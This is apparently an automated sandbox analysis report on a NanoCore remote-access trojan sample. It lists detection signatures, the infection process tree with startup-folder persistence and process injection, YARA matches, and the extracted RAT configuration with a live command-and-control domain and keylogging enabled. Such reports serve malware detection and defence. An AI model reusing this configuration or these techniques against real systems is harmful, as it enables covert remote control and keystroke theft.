Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
692BB93169319EBA2F556174D781A8636D610A67E6838.exe

Overview

General Information

Sample Name:692BB93169319EBA2F556174D781A8636D610A67E6838.exe
Analysis ID:629870
MD5:a93162e62b49a591e0d481e030ffc9ea
SHA1:b0c48a0fc418977051bea837c16aa7928f654da7
SHA256:692bb93169319eba2f556174d781a8636d610a67e6838e19300a8a2454cd8b2b
Tags:exeNanoCoreRAT
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • 692BB93169319EBA2F556174D781A8636D610A67E6838.exe (PID: 5844 cmdline: "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe" MD5: A93162E62B49A591E0D481E030FFC9EA)
    • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 5596 cmdline: "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe" MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • wscript.exe (PID: 2208 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ople.exe.exe (PID: 1796 cmdline: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe MD5: CA51A0A9E3EF192B26D9818DC4EC5FF0)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • RegAsm.exe (PID: 1428 cmdline: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "3b5167aa-3858-4f80-81dc-688e9982", "Group": "AtikuVSDino", "Domain1": "dinolachy.duckdns.org", "Domain2": "127.0.0.1", "Port": 5626, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfcf5:$a: NanoCore
    • 0xfd05:$a: NanoCore
    • 0xff39:$a: NanoCore
    • 0xff4d:$a: NanoCore
    • 0xff8d:$a: NanoCore
    • 0xfd54:$b: ClientPlugin
    • 0xff56:$b: ClientPlugin
    • 0xff96:$b: ClientPlugin
    • 0xfe7b:$c: ProjectData
    • 0x10882:$d: DESCrypto
    • 0x1824e:$e: KeepAlive
    • 0x1623c:$g: LogClientMessage
    • 0x12437:$i: get_Connected
    • 0x10bb8:$j: #=q
    • 0x10be8:$j: #=q
    • 0x10c04:$j: #=q
    • 0x10c34:$j: #=q
    • 0x10c50:$j: #=q
    • 0x10c6c:$j: #=q
    • 0x10c9c:$j: #=q
    • 0x10cb8:$j: #=q
    00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xf7ad:$x1: NanoCore.ClientPluginHost
    • 0xf7da:$x2: IClientNetworkHost
    00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xf7ad:$x2: NanoCore.ClientPluginHost
    • 0x10888:$s4: PipeCreated
    • 0xf7c7:$s5: IClientLoggingHost
    Click to see the 43 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    3.2.RegAsm.exe.56a4629.7.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xb184:$x1: NanoCore.ClientPluginHost
    • 0xb1b1:$x2: IClientNetworkHost
    3.2.RegAsm.exe.56a4629.7.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xb184:$x2: NanoCore.ClientPluginHost
    • 0xc25f:$s4: PipeCreated
    • 0xb19e:$s5: IClientLoggingHost
    3.2.RegAsm.exe.56a4629.7.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      3.2.RegAsm.exe.56a4629.7.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
      • 0xb14f:$x2: NanoCore.ClientPlugin
      • 0xb184:$x3: NanoCore.ClientPluginHost
      • 0xb143:$i2: IClientData
      • 0xb165:$i3: IClientNetwork
      • 0xb174:$i5: IClientDataHost
      • 0xb19e:$i6: IClientLoggingHost
      • 0xb1b1:$i7: IClientNetworkHost
      • 0xb1c4:$i8: IClientUIHost
      • 0xb1d2:$i9: IClientNameObjectCollection
      • 0xb1ee:$i10: IClientReadOnlyNameObjectCollection
      • 0xaf41:$s1: ClientPlugin
      • 0xb158:$s1: ClientPlugin
      • 0x10179:$s6: get_ClientSettings
      12.2.RegAsm.exe.2ffb670.1.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      Click to see the 88 entries

      Sigma Signatures

      AV Detection

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Data Obfuscation

      barindex
      Sigma detected: Drops script at startup location
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe, ProcessId: 5844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs

      Stealing of Sensitive Information

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "3b5167aa-3858-4f80-81dc-688e9982", "Group": "AtikuVSDino", "Domain1": "dinolachy.duckdns.org", "Domain2": "127.0.0.1", "Port": 5626, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
      Multi AV Scanner detection for submitted file
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeVirustotal: Detection: 72%Perma Link
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeMetadefender: Detection: 41%Perma Link
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeReversingLabs: Detection: 73%
      Antivirus / Scanner detection for submitted sample
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeAvira: detection malicious, Label: HEUR/AGEN.1213119
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeReversingLabs: Detection: 63%
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR
      Machine Learning detection for sample
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeJoe Sandbox ML: detected
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeJoe Sandbox ML: detected
      Source: 3.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 3.0.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 3.2.RegAsm.exe.56a0000.6.unpackAvira: Label: TR/NanoCore.fadte
      Source: 12.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 12.0.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: wntdll.pdbUGP source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255855415.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255315849.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.293078354.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.291812090.0000000002E50000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255855415.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255315849.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.293078354.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.291812090.0000000002E50000.00000004.00001000.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002651DA FindFirstFileExA,0_2_002651DA
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB51DA FindFirstFileExA,7_2_00AB51DA

      Networking

      barindex
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: dinolachy.duckdns.org
      Source: Malware configuration extractorURLs: 127.0.0.1
      Uses dynamic DNS services
      Source: unknownDNS query: name: dinolachy.duckdns.org
      Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
      Source: Joe Sandbox ViewIP Address: 192.169.69.25 192.169.69.25
      Source: Joe Sandbox ViewIP Address: 192.169.69.25 192.169.69.25
      Source: unknownDNS traffic detected: queries for: dinolachy.duckdns.org
      Source: RegAsm.exe, 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegAsm.exe.2dc5cb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
